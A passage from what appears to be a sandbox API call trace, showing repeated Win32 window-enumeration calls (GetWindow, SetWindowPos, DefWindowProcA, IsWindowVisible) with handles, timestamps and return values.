(hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.482] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.482] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.482] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.482] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.482] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.482] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.482] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.482] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.482] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 
0x1014e [0057.482] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.482] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.482] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.482] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.482] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.483] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.483] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.483] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.483] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.483] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.483] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.483] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.483] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.483] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.483] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.483] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.483] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.483] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.483] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.483] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.483] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.483] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.483] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.483] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.483] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.483] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.483] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.483] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.483] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.483] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.484] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.484] GetWindow (hWnd=0x100ea, 
uCmd=0x2) returned 0x100e8 [0057.484] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.484] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.484] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.484] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.484] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.484] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.484] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.484] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.484] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.484] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.484] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.484] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.484] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.484] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.484] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.484] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.484] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.484] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.484] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.484] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.484] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.484] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.485] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.485] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.485] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.485] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.485] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.485] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.485] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.485] GetWindow (hWnd=0x10110, uCmd=0x2) 
returned 0x200aa [0057.485] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.485] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.485] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.485] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.485] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.485] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.485] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.485] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.485] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.485] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.485] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.485] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.485] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.485] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.485] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.485] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.485] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.485] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.485] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.485] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.486] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.486] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.486] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.486] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.486] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.486] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.486] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.486] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.486] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.486] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.486] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.486] GetWindow (hWnd=0x101aa, 
uCmd=0x2) returned 0x10192 [0057.486] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.486] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.486] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.486] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.486] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.486] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.486] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.486] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.486] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.486] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.486] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.486] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.486] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.486] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.486] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.486] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.486] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.486] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.486] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.487] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.487] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.487] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.487] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.487] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.487] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.487] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.487] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.487] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.487] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.487] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.487] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.487] 
GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.487] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.487] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.487] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.487] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.487] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.487] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.487] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.487] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.487] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.487] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.487] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.487] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.487] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.487] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.487] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.487] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.487] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.487] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.488] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.488] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.488] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.488] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.488] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.488] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.488] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.488] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.488] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.488] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.488] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.488] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.488] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 
0x20080 [0057.488] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.488] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.488] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.488] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.488] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.488] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.488] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.488] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.488] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.488] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.488] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.488] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.488] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.488] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.488] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.488] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.488] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.488] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.489] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.489] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.489] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.489] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.489] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.489] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.489] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.489] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.489] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.489] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.489] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.489] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 
[0057.489] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.489] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.489] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.489] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.489] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.489] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.489] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.489] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.489] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.489] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.489] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.489] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.489] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.489] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.489] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.489] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.489] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.490] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.490] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.490] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.490] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.490] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.490] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.490] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.490] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.490] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.490] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.490] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.490] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.490] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.490] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.490] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 
0x101c8 [0057.490] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.490] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.490] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.490] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.490] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.490] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.490] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.490] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.490] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.490] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.490] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.491] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.491] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.491] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.491] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.491] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.491] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.491] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.491] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.491] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.491] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.491] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.491] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.491] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.491] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.491] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.491] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.491] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.491] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.491] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.491] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.491] GetWindow (hWnd=0x1015e, 
uCmd=0x2) returned 0x7013a [0057.491] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.491] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.491] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.492] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.492] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.492] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.492] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.492] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.492] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.492] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.492] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.492] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.492] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.492] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.492] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.492] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.492] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.492] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.492] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.492] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.492] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.492] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.492] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.492] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.492] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.492] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.492] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.493] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.493] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.493] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.493] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.493] 
GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.493] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.493] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.493] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.493] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.493] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.493] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.493] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.493] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.493] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.493] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.493] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.493] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.493] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.493] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.493] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.493] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.493] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.493] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.493] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.494] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.494] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.494] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.494] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.494] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.494] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.494] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.494] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.494] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.494] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.494] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.494] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, 
X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.494] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.494] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.494] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.494] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.494] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.494] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.494] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.494] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.494] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.494] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.494] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.494] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.494] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.494] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.495] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.495] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.495] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.495] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.495] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.495] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.495] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.495] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.495] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.495] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.495] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.495] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.495] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.495] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.495] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.495] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.495] 
GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.495] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.495] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.495] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.495] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.495] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.495] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.495] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.495] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.495] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.495] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.495] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.495] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.495] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.495] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.495] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.496] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.496] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.496] GetWindow (hWnd=0x1017c, 